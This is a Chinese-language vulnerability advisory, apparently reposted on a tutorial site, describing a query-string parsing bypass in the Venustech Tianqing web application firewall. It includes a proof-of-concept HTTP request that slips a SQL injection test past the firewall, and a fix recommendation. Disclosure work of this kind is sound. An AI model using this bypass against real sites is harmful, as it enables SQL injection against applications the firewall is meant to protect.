明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

啟明星辰天清Web應(yīng)用安全網(wǎng)關(guān)協(xié)議解析繞過漏洞

[摘要]啟明星辰天清Web應(yīng)用安全網(wǎng)關(guān)中存在協(xié)議解析繞過漏洞,該漏洞源于對http協(xié)議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網(wǎng)站。 Serv...



    啟明星辰天清Web應(yīng)用安全網(wǎng)關(guān)中存在協(xié)議解析繞過漏洞,該漏洞源于對http協(xié)議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網(wǎng)站。
    Servlet/2.5等jsp處理容器,能夠正確處理http協(xié)議GET /news.jsp?x= &id=16 HTTP/1.1中參數(shù)&id=16前面的空格獲取id=16這個參數(shù),例如下數(shù)據(jù)包返回網(wǎng)頁正常:


    GET /news.jsp?x= &id=16 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache





    與http://www.test.com/news.jsp?id=16返回網(wǎng)頁相同。





    而啟明星辰天清Web應(yīng)用安全網(wǎng)關(guān)解析協(xié)議時,會忽略GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1中"?x=空格"之后的參數(shù),從而繞過防護。

    例直接訪問:http://www.test.com/news.jsp?x=%20&id=16%20and%201=1會攔截

    構(gòu)造如下poc繞過:

    GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache

    修復(fù)方案:

    正確解析http請求第一行中 url參數(shù)帶空格字符后的參數(shù)
 


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費電腦中毒的煩擾。